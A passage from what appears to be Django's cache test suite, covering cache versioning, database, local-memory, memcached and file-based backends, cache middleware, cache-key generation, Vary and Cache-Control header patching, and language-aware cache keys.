cache.set_many({'ford1': 37, 'arthur1': 42})
self.assertEqual(cache.get_many(['ford1', 'arthur1']), {'ford1': 37, 'arthur1': 42})
self.assertEqual(cache.get_many(['ford1', 'arthur1'], version=1), {'ford1': 37, 'arthur1': 42})
self.assertEqual(cache.get_many(['ford1', 'arthur1'], version=2), {})
self.assertEqual(caches['v2'].get_many(['ford1', 'arthur1']), {})
self.assertEqual(caches['v2'].get_many(['ford1', 'arthur1'], version=1), {'ford1': 37, 'arthur1': 42})
self.assertEqual(caches['v2'].get_many(['ford1', 'arthur1'], version=2), {})
# set, default version = 1, but manually override version = 2
cache.set_many({'ford2': 37, 'arthur2': 42}, version=2)
self.assertEqual(cache.get_many(['ford2', 'arthur2']), {})
self.assertEqual(cache.get_many(['ford2', 'arthur2'], version=1), {})
self.assertEqual(cache.get_many(['ford2', 'arthur2'], version=2), {'ford2': 37, 'arthur2': 42})
self.assertEqual(caches['v2'].get_many(['ford2', 'arthur2']), {'ford2': 37, 'arthur2': 42})
self.assertEqual(caches['v2'].get_many(['ford2', 'arthur2'], version=1), {})
self.assertEqual(caches['v2'].get_many(['ford2', 'arthur2'], version=2), {'ford2': 37, 'arthur2': 42})
# v2 set, using default version = 2
caches['v2'].set_many({'ford3': 37, 'arthur3': 42})
self.assertEqual(cache.get_many(['ford3', 'arthur3']), {})
self.assertEqual(cache.get_many(['ford3', 'arthur3'], version=1), {})
self.assertEqual(cache.get_many(['ford3', 'arthur3'], version=2), {'ford3': 37, 'arthur3': 42})
self.assertEqual(caches['v2'].get_many(['ford3', 'arthur3']), {'ford3': 37, 'arthur3': 42})
self.assertEqual(caches['v2'].get_many(['ford3', 'arthur3'], version=1), {})
self.assertEqual(caches['v2'].get_many(['ford3', 'arthur3'], version=2), {'ford3': 37, 'arthur3': 42})
# v2 set, default version = 2, but manually override version = 1
caches['v2'].set_many({'ford4': 37, 'arthur4': 42}, version=1)
self.assertEqual(cache.get_many(['ford4', 'arthur4']), {'ford4': 37, 'arthur4': 42})
self.assertEqual(cache.get_many(['ford4', 'arthur4'], version=1), {'ford4': 37, 'arthur4': 42})
self.assertEqual(cache.get_many(['ford4', 'arthur4'], version=2), {})
self.assertEqual(caches['v2'].get_many(['ford4', 'arthur4']), {})
self.assertEqual(caches['v2'].get_many(['ford4', 'arthur4'], version=1), {'ford4': 37, 'arthur4': 42})
self.assertEqual(caches['v2'].get_many(['ford4', 'arthur4'], version=2), {})
def test_incr_version(self):
cache.set('answer', 42, version=2)
self.assertIsNone(cache.get('answer'))
self.assertIsNone(cache.get('answer', version=1))
self.assertEqual(cache.get('answer', version=2), 42)
self.assertIsNone(cache.get('answer', version=3))
self.assertEqual(cache.incr_version('answer', version=2), 3)
self.assertIsNone(cache.get('answer'))
self.assertIsNone(cache.get('answer', version=1))
self.assertIsNone(cache.get('answer', version=2))
self.assertEqual(cache.get('answer', version=3), 42)
caches['v2'].set('answer2', 42)
self.assertEqual(caches['v2'].get('answer2'), 42)
self.assertIsNone(caches['v2'].get('answer2', version=1))
self.assertEqual(caches['v2'].get('answer2', version=2), 42)
self.assertIsNone(caches['v2'].get('answer2', version=3))
self.assertEqual(caches['v2'].incr_version('answer2'), 3)
self.assertIsNone(caches['v2'].get('answer2'))
self.assertIsNone(caches['v2'].get('answer2', version=1))
self.assertIsNone(caches['v2'].get('answer2', version=2))
self.assertEqual(caches['v2'].get('answer2', version=3), 42)
with self.assertRaises(ValueError):
cache.incr_version('does_not_exist')
def test_decr_version(self):
cache.set('answer', 42, version=2)
self.assertIsNone(cache.get('answer'))
self.assertIsNone(cache.get('answer', version=1))
self.assertEqual(cache.get('answer', version=2), 42)
self.assertEqual(cache.decr_version('answer', version=2), 1)
self.assertEqual(cache.get('answer'), 42)
self.assertEqual(cache.get('answer', version=1), 42)
self.assertIsNone(cache.get('answer', version=2))
caches['v2'].set('answer2', 42)
self.assertEqual(caches['v2'].get('answer2'), 42)
self.assertIsNone(caches['v2'].get('answer2', version=1))
self.assertEqual(caches['v2'].get('answer2', version=2), 42)
self.assertEqual(caches['v2'].decr_version('answer2'), 1)
self.assertIsNone(caches['v2'].get('answer2'))
self.assertEqual(caches['v2'].get('answer2', version=1), 42)
self.assertIsNone(caches['v2'].get('answer2', version=2))
with self.assertRaises(ValueError):
cache.decr_version('does_not_exist', version=2)
def test_custom_key_func(self):
# Two caches with different key functions aren't visible to each other
cache.set('answer1', 42)
self.assertEqual(cache.get('answer1'), 42)
self.assertIsNone(caches['custom_key'].get('answer1'))
self.assertIsNone(caches['custom_key2'].get('answer1'))
caches['custom_key'].set('answer2', 42)
self.assertIsNone(cache.get('answer2'))
self.assertEqual(caches['custom_key'].get('answer2'), 42)
self.assertEqual(caches['custom_key2'].get('answer2'), 42)
def test_cache_write_unpicklable_object(self):
update_middleware = UpdateCacheMiddleware()
update_middleware.cache = cache
fetch_middleware = FetchFromCacheMiddleware()
fetch_middleware.cache = cache
request = self.factory.get('/cache/test')
request._cache_update_cache = True
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertIsNone(get_cache_data)
response = HttpResponse()
content = 'Testing cookie serialization.'
response.content = content
response.set_cookie('foo', 'bar')
update_middleware.process_response(request, response)
get_cache_data = fetch_middleware.process_request(request)
self.assertIsNotNone(get_cache_data)
self.assertEqual(get_cache_data.content, content.encode())
self.assertEqual(get_cache_data.cookies, response.cookies)
update_middleware.process_response(request, get_cache_data)
get_cache_data = fetch_middleware.process_request(request)
self.assertIsNotNone(get_cache_data)
self.assertEqual(get_cache_data.content, content.encode())
self.assertEqual(get_cache_data.cookies, response.cookies)
def test_add_fail_on_pickleerror(self):
# Shouldn't fail silently if trying to cache an unpicklable type.
with self.assertRaises(pickle.PickleError):
cache.add('unpicklable', Unpicklable())
def test_set_fail_on_pickleerror(self):
with self.assertRaises(pickle.PickleError):
cache.set('unpicklable', Unpicklable())
def test_get_or_set(self):
self.assertIsNone(cache.get('projector'))
self.assertEqual(cache.get_or_set('projector', 42), 42)
self.assertEqual(cache.get('projector'), 42)
self.assertEqual(cache.get_or_set('null', None), None)
def test_get_or_set_callable(self):
def my_callable():
return 'value'
self.assertEqual(cache.get_or_set('mykey', my_callable), 'value')
self.assertEqual(cache.get_or_set('mykey', my_callable()), 'value')
def test_get_or_set_version(self):
msg = "get_or_set() missing 1 required positional argument: 'default'"
cache.get_or_set('brian', 1979, version=2)
with self.assertRaisesMessage(TypeError, msg):
cache.get_or_set('brian')
with self.assertRaisesMessage(TypeError, msg):
cache.get_or_set('brian', version=1)
self.assertIsNone(cache.get('brian', version=1))
self.assertEqual(cache.get_or_set('brian', 42, version=1), 42)
self.assertEqual(cache.get_or_set('brian', 1979, version=2), 1979)
self.assertIsNone(cache.get('brian', version=3))
def test_get_or_set_racing(self):
with mock.patch('%s.%s' % (settings.CACHES['default']['BACKEND'], 'add')) as cache_add:
# Simulate cache.add() failing to add a value. In that case, the
# default value should be returned.
cache_add.return_value = False
self.assertEqual(cache.get_or_set('key', 'default'), 'default')
@override_settings(CACHES=caches_setting_for_tests(
BACKEND='django.core.cache.backends.db.DatabaseCache',
# Spaces are used in the table name to ensure quoting/escaping is working
LOCATION='test cache table'
))
class DBCacheTests(BaseCacheTests, TransactionTestCase):
available_apps = ['cache']
def setUp(self):
# The super calls needs to happen first for the settings override.
super().setUp()
self.create_table()
def tearDown(self):
# The super call needs to happen first because it uses the database.
super().tearDown()
self.drop_table()
def create_table(self):
management.call_command('createcachetable', verbosity=0)
def drop_table(self):
with connection.cursor() as cursor:
table_name = connection.ops.quote_name('test cache table')
cursor.execute('DROP TABLE %s' % table_name)
def test_zero_cull(self):
self._perform_cull_test(caches['zero_cull'], 50, 18)
def test_second_call_doesnt_crash(self):
out = io.StringIO()
management.call_command('createcachetable', stdout=out)
self.assertEqual(out.getvalue(), "Cache table 'test cache table' already exists.\n" * len(settings.CACHES))
@override_settings(CACHES=caches_setting_for_tests(
BACKEND='django.core.cache.backends.db.DatabaseCache',
# Use another table name to avoid the 'table already exists' message.
LOCATION='createcachetable_dry_run_mode'
))
def test_createcachetable_dry_run_mode(self):
out = io.StringIO()
management.call_command('createcachetable', dry_run=True, stdout=out)
output = out.getvalue()
self.assertTrue(output.startswith("CREATE TABLE"))
def test_createcachetable_with_table_argument(self):
"""
Delete and recreate cache table with legacy behavior (explicitly
specifying the table name).
"""
self.drop_table()
out = io.StringIO()
management.call_command(
'createcachetable',
'test cache table',
verbosity=2,
stdout=out,
)
self.assertEqual(out.getvalue(), "Cache table 'test cache table' created.\n")
@override_settings(USE_TZ=True)
class DBCacheWithTimeZoneTests(DBCacheTests):
pass
class DBCacheRouter:
"""A router that puts the cache table on the 'other' database."""
def db_for_read(self, model, **hints):
if model._meta.app_label == 'django_cache':
return 'other'
return None
def db_for_write(self, model, **hints):
if model._meta.app_label == 'django_cache':
return 'other'
return None
def allow_migrate(self, db, app_label, **hints):
if app_label == 'django_cache':
return db == 'other'
return None
@override_settings(
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.db.DatabaseCache',
'LOCATION': 'my_cache_table',
},
},
)
class CreateCacheTableForDBCacheTests(TestCase):
multi_db = True
@override_settings(DATABASE_ROUTERS=[DBCacheRouter()])
def test_createcachetable_observes_database_router(self):
# cache table should not be created on 'default'
with self.assertNumQueries(0, using='default'):
management.call_command('createcachetable', database='default', verbosity=0)
# cache table should be created on 'other'
# Queries:
# 1: check table doesn't already exist
# 2: create savepoint (if transactional DDL is supported)
# 3: create the table
# 4: create the index
# 5: release savepoint (if transactional DDL is supported)
num = 5 if connections['other'].features.can_rollback_ddl else 3
with self.assertNumQueries(num, using='other'):
management.call_command('createcachetable', database='other', verbosity=0)
class PicklingSideEffect:
def __init__(self, cache):
self.cache = cache
self.locked = False
def __getstate__(self):
if self.cache._lock.active_writers:
self.locked = True
return {}
@override_settings(CACHES=caches_setting_for_tests(
BACKEND='django.core.cache.backends.locmem.LocMemCache',
))
class LocMemCacheTests(BaseCacheTests, TestCase):
def setUp(self):
super().setUp()
# LocMem requires a hack to make the other caches
# share a data store with the 'normal' cache.
caches['prefix']._cache = cache._cache
caches['prefix']._expire_info = cache._expire_info
caches['v2']._cache = cache._cache
caches['v2']._expire_info = cache._expire_info
caches['custom_key']._cache = cache._cache
caches['custom_key']._expire_info = cache._expire_info
caches['custom_key2']._cache = cache._cache
caches['custom_key2']._expire_info = cache._expire_info
@override_settings(CACHES={
'default': {'BACKEND': 'django.core.cache.backends.locmem.LocMemCache'},
'other': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'LOCATION': 'other'
},
})
def test_multiple_caches(self):
"Multiple locmem caches are isolated"
cache.set('value', 42)
self.assertEqual(caches['default'].get('value'), 42)
self.assertIsNone(caches['other'].get('value'))
def test_locking_on_pickle(self):
"""#20613/#18541 -- Ensures pickling is done outside of the lock."""
bad_obj = PicklingSideEffect(cache)
cache.set('set', bad_obj)
self.assertFalse(bad_obj.locked, "Cache was locked during pickling")
cache.add('add', bad_obj)
self.assertFalse(bad_obj.locked, "Cache was locked during pickling")
def test_incr_decr_timeout(self):
"""incr/decr does not modify expiry time (matches memcached behavior)"""
key = 'value'
_key = cache.make_key(key)
cache.set(key, 1, timeout=cache.default_timeout * 10)
expire = cache._expire_info[_key]
cache.incr(key)
self.assertEqual(expire, cache._expire_info[_key])
cache.decr(key)
self.assertEqual(expire, cache._expire_info[_key])
# memcached backend isn't guaranteed to be available.
# To check the memcached backend, the test settings file will
# need to contain at least one cache backend setting that points at
# your memcache server.
configured_caches = {}
for _cache_params in settings.CACHES.values():
configured_caches[_cache_params['BACKEND']] = _cache_params
MemcachedCache_params = configured_caches.get('django.core.cache.backends.memcached.MemcachedCache')
PyLibMCCache_params = configured_caches.get('django.core.cache.backends.memcached.PyLibMCCache')
# The memcached backends don't support cull-related options like `MAX_ENTRIES`.
memcached_excluded_caches = {'cull', 'zero_cull'}
class BaseMemcachedTests(BaseCacheTests):
# By default it's assumed that the client doesn't clean up connections
# properly, in which case the backend must do so after each request.
should_disconnect_on_close = True
def test_location_multiple_servers(self):
locations = [
['server1.tld', 'server2:11211'],
'server1.tld;server2:11211',
'server1.tld,server2:11211',
]
for location in locations:
with self.subTest(location=location):
params = {'BACKEND': self.base_params['BACKEND'], 'LOCATION': location}
with self.settings(CACHES={'default': params}):
self.assertEqual(cache._servers, ['server1.tld', 'server2:11211'])
def test_invalid_key_characters(self):
"""
On memcached, we don't introduce a duplicate key validation
step (for speed reasons), we just let the memcached API
library raise its own exception on bad keys. Refs #6447.
In order to be memcached-API-library agnostic, we only assert
that a generic exception of some kind is raised.
"""
# memcached does not allow whitespace or control characters in keys
# when using the ascii protocol.
with self.assertRaises(Exception):
cache.set('key with spaces', 'value')
def test_invalid_key_length(self):
# memcached limits key length to 250
with self.assertRaises(Exception):
cache.set('a' * 251, 'value')
def test_default_never_expiring_timeout(self):
# Regression test for #22845
with self.settings(CACHES=caches_setting_for_tests(
base=self.base_params,
exclude=memcached_excluded_caches,
TIMEOUT=None)):
cache.set('infinite_foo', 'bar')
self.assertEqual(cache.get('infinite_foo'), 'bar')
def test_default_far_future_timeout(self):
# Regression test for #22845
with self.settings(CACHES=caches_setting_for_tests(
base=self.base_params,
exclude=memcached_excluded_caches,
# 60*60*24*365, 1 year
TIMEOUT=31536000)):
cache.set('future_foo', 'bar')
self.assertEqual(cache.get('future_foo'), 'bar')
def test_cull(self):
# culling isn't implemented, memcached deals with it.
pass
def test_zero_cull(self):
# culling isn't implemented, memcached deals with it.
pass
def test_memcached_deletes_key_on_failed_set(self):
# By default memcached allows objects up to 1MB. For the cache_db session
# backend to always use the current session, memcached needs to delete
# the old key if it fails to set.
# pylibmc doesn't seem to have SERVER_MAX_VALUE_LENGTH as far as I can
# tell from a quick check of its source code. This is falling back to
# the default value exposed by python-memcached on my system.
max_value_length = getattr(cache._lib, 'SERVER_MAX_VALUE_LENGTH', 1048576)
cache.set('small_value', 'a')
self.assertEqual(cache.get('small_value'), 'a')
large_value = 'a' * (max_value_length + 1)
try:
cache.set('small_value', large_value)
except Exception:
# Some clients (e.g. pylibmc) raise when the value is too large,
# while others (e.g. python-memcached) intentionally return True
# indicating success. This test is primarily checking that the key
# was deleted, so the return/exception behavior for the set()
# itself is not important.
pass
# small_value should be deleted, or set if configured to accept larger values
value = cache.get('small_value')
self.assertTrue(value is None or value == large_value)
def test_close(self):
# For clients that don't manage their connections properly, the
# connection is closed when the request is complete.
signals.request_finished.disconnect(close_old_connections)
try:
with mock.patch.object(cache._lib.Client, 'disconnect_all', autospec=True) as mock_disconnect:
signals.request_finished.send(self.__class__)
self.assertIs(mock_disconnect.called, self.should_disconnect_on_close)
finally:
signals.request_finished.connect(close_old_connections)
@unittest.skipUnless(MemcachedCache_params, "MemcachedCache backend not configured")
@override_settings(CACHES=caches_setting_for_tests(
base=MemcachedCache_params,
exclude=memcached_excluded_caches,
))
class MemcachedCacheTests(BaseMemcachedTests, TestCase):
base_params = MemcachedCache_params
def test_memcached_uses_highest_pickle_version(self):
# Regression test for #19810
for cache_key in settings.CACHES:
with self.subTest(cache_key=cache_key):
self.assertEqual(caches[cache_key]._cache.pickleProtocol, pickle.HIGHEST_PROTOCOL)
@override_settings(CACHES=caches_setting_for_tests(
base=MemcachedCache_params,
exclude=memcached_excluded_caches,
OPTIONS={'server_max_value_length': 9999},
))
def test_memcached_options(self):
self.assertEqual(cache._cache.server_max_value_length, 9999)
@unittest.skipUnless(PyLibMCCache_params, "PyLibMCCache backend not configured")
@override_settings(CACHES=caches_setting_for_tests(
base=PyLibMCCache_params,
exclude=memcached_excluded_caches,
))
class PyLibMCCacheTests(BaseMemcachedTests, TestCase):
base_params = PyLibMCCache_params
# libmemcached manages its own connections.
should_disconnect_on_close = False
# By default, pylibmc/libmemcached don't verify keys client-side and so
# this test triggers a server-side bug that causes later tests to fail
# (#19914). The `verify_keys` behavior option could be set to True (which
# would avoid triggering the server-side bug), however this test would
# still fail due to https://github.com/lericson/pylibmc/issues/219.
@unittest.skip("triggers a memcached-server bug, causing subsequent tests to fail")
def test_invalid_key_characters(self):
pass
@override_settings(CACHES=caches_setting_for_tests(
base=PyLibMCCache_params,
exclude=memcached_excluded_caches,
OPTIONS={
'binary': True,
'behaviors': {'tcp_nodelay': True},
},
))
def test_pylibmc_options(self):
self.assertTrue(cache._cache.binary)
self.assertEqual(cache._cache.behaviors['tcp_nodelay'], int(True))
@override_settings(CACHES=caches_setting_for_tests(
base=PyLibMCCache_params,
exclude=memcached_excluded_caches,
OPTIONS={'tcp_nodelay': True},
))
def test_pylibmc_legacy_options(self):
deprecation_message = (
"Specifying pylibmc cache behaviors as a top-level property "
"within `OPTIONS` is deprecated. Move `tcp_nodelay` into a dict named "
"`behaviors` inside `OPTIONS` instead."
)
with warnings.catch_warnings(record=True) as warns:
warnings.simplefilter("always")
self.assertEqual(cache._cache.behaviors['tcp_nodelay'], int(True))
self.assertEqual(len(warns), 1)
self.assertIsInstance(warns[0].message, RemovedInDjango21Warning)
self.assertEqual(str(warns[0].message), deprecation_message)
@override_settings(CACHES=caches_setting_for_tests(
BACKEND='django.core.cache.backends.filebased.FileBasedCache',
))
class FileBasedCacheTests(BaseCacheTests, TestCase):
"""
Specific test cases for the file-based cache.
"""
def setUp(self):
super().setUp()
self.dirname = tempfile.mkdtemp()
# Caches location cannot be modified through override_settings / modify_settings,
# hence settings are manipulated directly here and the setting_changed signal
# is triggered manually.
for cache_params in settings.CACHES.values():
cache_params.update({'LOCATION': self.dirname})
setting_changed.send(self.__class__, setting='CACHES', enter=False)
def tearDown(self):
super().tearDown()
# Call parent first, as cache.clear() may recreate cache base directory
shutil.rmtree(self.dirname)
def test_ignores_non_cache_files(self):
fname = os.path.join(self.dirname, 'not-a-cache-file')
with open(fname, 'w'):
os.utime(fname, None)
cache.clear()
self.assertTrue(os.path.exists(fname),
'Expected cache.clear to ignore non cache files')
os.remove(fname)
def test_clear_does_not_remove_cache_dir(self):
cache.clear()
self.assertTrue(os.path.exists(self.dirname),
'Expected cache.clear to keep the cache dir')
def test_creates_cache_dir_if_nonexistent(self):
os.rmdir(self.dirname)
cache.set('foo', 'bar')
os.path.exists(self.dirname)
def test_get_ignores_enoent(self):
cache.set('foo', 'bar')
os.unlink(cache._key_to_file('foo'))
# Returns the default instead of erroring.
self.assertEqual(cache.get('foo', 'baz'), 'baz')
def test_get_does_not_ignore_non_filenotfound_exceptions(self):
with mock.patch('builtins.open', side_effect=IOError):
with self.assertRaises(IOError):
cache.get('foo')
def test_empty_cache_file_considered_expired(self):
cache_file = cache._key_to_file('foo')
with open(cache_file, 'wb') as fh:
fh.write(b'')
with open(cache_file, 'rb') as fh:
self.assertIs(cache._is_expired(fh), True)
@override_settings(CACHES={
'default': {
'BACKEND': 'cache.liberal_backend.CacheClass',
},
})
class CustomCacheKeyValidationTests(SimpleTestCase):
"""
Tests for the ability to mixin a custom ``validate_key`` method to
a custom cache backend that otherwise inherits from a builtin
backend, and override the default key validation. Refs #6447.
"""
def test_custom_key_validation(self):
# this key is both longer than 250 characters, and has spaces
key = 'some key with spaces' * 15
val = 'a value'
cache.set(key, val)
self.assertEqual(cache.get(key), val)
@override_settings(
CACHES={
'default': {
'BACKEND': 'cache.closeable_cache.CacheClass',
}
}
)
class CacheClosingTests(SimpleTestCase):
def test_close(self):
self.assertFalse(cache.closed)
signals.request_finished.send(self.__class__)
self.assertTrue(cache.closed)
DEFAULT_MEMORY_CACHES_SETTINGS = {
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'LOCATION': 'unique-snowflake',
}
}
NEVER_EXPIRING_CACHES_SETTINGS = copy.deepcopy(DEFAULT_MEMORY_CACHES_SETTINGS)
NEVER_EXPIRING_CACHES_SETTINGS['default']['TIMEOUT'] = None
class DefaultNonExpiringCacheKeyTests(SimpleTestCase):
"""
Settings having Cache arguments with a TIMEOUT=None create Caches that will
set non-expiring keys.
"""
def setUp(self):
# The 5 minute (300 seconds) default expiration time for keys is
# defined in the implementation of the initializer method of the
# BaseCache type.
self.DEFAULT_TIMEOUT = caches[DEFAULT_CACHE_ALIAS].default_timeout
def tearDown(self):
del(self.DEFAULT_TIMEOUT)
def test_default_expiration_time_for_keys_is_5_minutes(self):
"""The default expiration time of a cache key is 5 minutes.
This value is defined in
django.core.cache.backends.base.BaseCache.__init__().
"""
self.assertEqual(300, self.DEFAULT_TIMEOUT)
def test_caches_with_unset_timeout_has_correct_default_timeout(self):
"""Caches that have the TIMEOUT parameter undefined in the default
settings will use the default 5 minute timeout.
"""
cache = caches[DEFAULT_CACHE_ALIAS]
self.assertEqual(self.DEFAULT_TIMEOUT, cache.default_timeout)
@override_settings(CACHES=NEVER_EXPIRING_CACHES_SETTINGS)
def test_caches_set_with_timeout_as_none_has_correct_default_timeout(self):
"""Memory caches that have the TIMEOUT parameter set to `None` in the
default settings with have `None` as the default timeout.
This means "no timeout".
"""
cache = caches[DEFAULT_CACHE_ALIAS]
self.assertIsNone(cache.default_timeout)
self.assertIsNone(cache.get_backend_timeout())
@override_settings(CACHES=DEFAULT_MEMORY_CACHES_SETTINGS)
def test_caches_with_unset_timeout_set_expiring_key(self):
"""Memory caches that have the TIMEOUT parameter unset will set cache
keys having the default 5 minute timeout.
"""
key = "my-key"
value = "my-value"
cache = caches[DEFAULT_CACHE_ALIAS]
cache.set(key, value)
cache_key = cache.make_key(key)
self.assertIsNotNone(cache._expire_info[cache_key])
@override_settings(CACHES=NEVER_EXPIRING_CACHES_SETTINGS)
def test_caches_set_with_timeout_as_none_set_non_expiring_key(self):
"""Memory caches that have the TIMEOUT parameter set to `None` will set
a non expiring key by default.
"""
key = "another-key"
value = "another-value"
cache = caches[DEFAULT_CACHE_ALIAS]
cache.set(key, value)
cache_key = cache.make_key(key)
self.assertIsNone(cache._expire_info[cache_key])
@override_settings(
CACHE_MIDDLEWARE_KEY_PREFIX='settingsprefix',
CACHE_MIDDLEWARE_SECONDS=1,
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
},
},
USE_I18N=False,
ALLOWED_HOSTS=['.example.com'],
)
class CacheUtils(SimpleTestCase):
"""TestCase for django.utils.cache functions."""
def setUp(self):
self.host = 'www.example.com'
self.path = '/cache/test/'
self.factory = RequestFactory(HTTP_HOST=self.host)
def tearDown(self):
cache.clear()
def _get_request_cache(self, method='GET', query_string=None, update_cache=None):
request = self._get_request(self.host, self.path,
method, query_string=query_string)
request._cache_update_cache = True if not update_cache else update_cache
return request
def _set_cache(self, request, msg):
response = HttpResponse()
response.content = msg
return UpdateCacheMiddleware().process_response(request, response)
def test_patch_vary_headers(self):
headers = (
# Initial vary, new headers, resulting vary.
(None, ('Accept-Encoding',), 'Accept-Encoding'),
('Accept-Encoding', ('accept-encoding',), 'Accept-Encoding'),
('Accept-Encoding', ('ACCEPT-ENCODING',), 'Accept-Encoding'),
('Cookie', ('Accept-Encoding',), 'Cookie, Accept-Encoding'),
('Cookie, Accept-Encoding', ('Accept-Encoding',), 'Cookie, Accept-Encoding'),
('Cookie, Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'),
(None, ('Accept-Encoding', 'COOKIE'), 'Accept-Encoding, COOKIE'),
('Cookie, Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'),
('Cookie , Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'),
)
for initial_vary, newheaders, resulting_vary in headers:
with self.subTest(initial_vary=initial_vary, newheaders=newheaders):
response = HttpResponse()
if initial_vary is not None:
response['Vary'] = initial_vary
patch_vary_headers(response, newheaders)
self.assertEqual(response['Vary'], resulting_vary)
def test_get_cache_key(self):
request = self.factory.get(self.path)
response = HttpResponse()
# Expect None if no headers have been set yet.
self.assertIsNone(get_cache_key(request))
# Set headers to an empty list.
learn_cache_key(request, response)
self.assertEqual(
get_cache_key(request),
'views.decorators.cache.cache_page.settingsprefix.GET.'
'18a03f9c9649f7d684af5db3524f5c99.d41d8cd98f00b204e9800998ecf8427e'
)
# A specified key_prefix is taken into account.
key_prefix = 'localprefix'
learn_cache_key(request, response, key_prefix=key_prefix)
self.assertEqual(
get_cache_key(request, key_prefix=key_prefix),
'views.decorators.cache.cache_page.localprefix.GET.'
'18a03f9c9649f7d684af5db3524f5c99.d41d8cd98f00b204e9800998ecf8427e'
)
def test_get_cache_key_with_query(self):
request = self.factory.get(self.path, {'test': 1})
response = HttpResponse()
# Expect None if no headers have been set yet.
self.assertIsNone(get_cache_key(request))
# Set headers to an empty list.
learn_cache_key(request, response)
# The querystring is taken into account.
self.assertEqual(
get_cache_key(request),
'views.decorators.cache.cache_page.settingsprefix.GET.'
'beaf87a9a99ee81c673ea2d67ccbec2a.d41d8cd98f00b204e9800998ecf8427e'
)
def test_cache_key_varies_by_url(self):
"""
get_cache_key keys differ by fully-qualified URL instead of path
"""
request1 = self.factory.get(self.path, HTTP_HOST='sub-1.example.com')
learn_cache_key(request1, HttpResponse())
request2 = self.factory.get(self.path, HTTP_HOST='sub-2.example.com')
learn_cache_key(request2, HttpResponse())
self.assertNotEqual(get_cache_key(request1), get_cache_key(request2))
def test_learn_cache_key(self):
request = self.factory.head(self.path)
response = HttpResponse()
response['Vary'] = 'Pony'
# Make sure that the Vary header is added to the key hash
learn_cache_key(request, response)
self.assertEqual(
get_cache_key(request),
'views.decorators.cache.cache_page.settingsprefix.GET.'
'18a03f9c9649f7d684af5db3524f5c99.d41d8cd98f00b204e9800998ecf8427e'
)
def test_patch_cache_control(self):
tests = (
# Initial Cache-Control, kwargs to patch_cache_control, expected Cache-Control parts
(None, {'private': True}, {'private'}),
('', {'private': True}, {'private'}),
# Test whether private/public attributes are mutually exclusive
('private', {'private': True}, {'private'}),
('private', {'public': True}, {'public'}),
('public', {'public': True}, {'public'}),
('public', {'private': True}, {'private'}),
('must-revalidate,max-age=60,private', {'public': True}, {'must-revalidate', 'max-age=60', 'public'}),
('must-revalidate,max-age=60,public', {'private': True}, {'must-revalidate', 'max-age=60', 'private'}),
('must-revalidate,max-age=60', {'public': True}, {'must-revalidate', 'max-age=60', 'public'}),
)
cc_delim_re = re.compile(r'\s*,\s*')
for initial_cc, newheaders, expected_cc in tests:
with self.subTest(initial_cc=initial_cc, newheaders=newheaders):
response = HttpResponse()
if initial_cc is not None:
response['Cache-Control'] = initial_cc
patch_cache_control(response, **newheaders)
parts = set(cc_delim_re.split(response['Cache-Control']))
self.assertEqual(parts, expected_cc)
@override_settings(
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'KEY_PREFIX': 'cacheprefix',
},
},
)
class PrefixedCacheUtils(CacheUtils):
pass
@override_settings(
CACHE_MIDDLEWARE_SECONDS=60,
CACHE_MIDDLEWARE_KEY_PREFIX='test',
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
},
},
)
class CacheHEADTest(SimpleTestCase):
def setUp(self):
self.path = '/cache/test/'
self.factory = RequestFactory()
def tearDown(self):
cache.clear()
def _set_cache(self, request, msg):
response = HttpResponse()
response.content = msg
return UpdateCacheMiddleware().process_response(request, response)
def test_head_caches_correctly(self):
test_content = 'test content'
request = self.factory.head(self.path)
request._cache_update_cache = True
self._set_cache(request, test_content)
request = self.factory.head(self.path)
request._cache_update_cache = True
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertIsNotNone(get_cache_data)
self.assertEqual(test_content.encode(), get_cache_data.content)
def test_head_with_cached_get(self):
test_content = 'test content'
request = self.factory.get(self.path)
request._cache_update_cache = True
self._set_cache(request, test_content)
request = self.factory.head(self.path)
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertIsNotNone(get_cache_data)
self.assertEqual(test_content.encode(), get_cache_data.content)
@override_settings(
CACHE_MIDDLEWARE_KEY_PREFIX='settingsprefix',
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
},
},
LANGUAGES=[
('en', 'English'),
('es', 'Spanish'),
],
)
class CacheI18nTest(TestCase):
def setUp(self):
self.path = '/cache/test/'
self.factory = RequestFactory()
def tearDown(self):
cache.clear()
@override_settings(USE_I18N=True, USE_L10N=False, USE_TZ=False)
def test_cache_key_i18n_translation(self):
request = self.factory.get(self.path)
lang = translation.get_language()
response = HttpResponse()
key = learn_cache_key(request, response)
self.assertIn(lang, key, "Cache keys should include the language name when translation is active")
key2 = get_cache_key(request)
self.assertEqual(key, key2)
def check_accept_language_vary(self, accept_language, vary, reference_key):
request = self.factory.get(self.path)
request.META['HTTP_ACCEPT_LANGUAGE'] = accept_language
request.META['HTTP_ACCEPT_ENCODING'] = 'gzip;q=1.0, identity; q=0.5, *;q=0'
response = HttpResponse()
response['Vary'] = vary
key = learn_cache_key(request, response)
key2 = get_cache_key(request)
self.assertEqual(key, reference_key)
self.assertEqual(key2, reference_key)
@override_settings(USE_I18N=True, USE_L10N=False, USE_TZ=False)
def test_cache_key_i18n_translation_accept_language(self):
lang = translation.get_language()
self.assertEqual(lang, 'en')
request = self.factory.get(self.path)
request.META['HTTP_ACCEPT_ENCODING'] = 'gzip;q=1.0, identity; q=0.5, *;q=0'
response = HttpResponse()
response['Vary'] = 'accept-encoding'
key = learn_cache_key(request, response)
self.assertIn(lang, key, "Cache keys should include the language name when translation is active")
self.check_accept_language_vary(
'en-us',
'cookie, accept-language, accept-encoding',
key
)
self.check_accept_language_vary(
'en-US',
'cookie, accept-encoding, accept-language',
key
)
self.check_accept_language_vary(
'en-US,en;q=0.8',
'accept-encoding, accept-language, cookie',
key
)
self.check_accept_language_vary(
'en-US,en;q=0.8,ko;q=0.6',
'accept-language, cookie, accept-encoding',
key
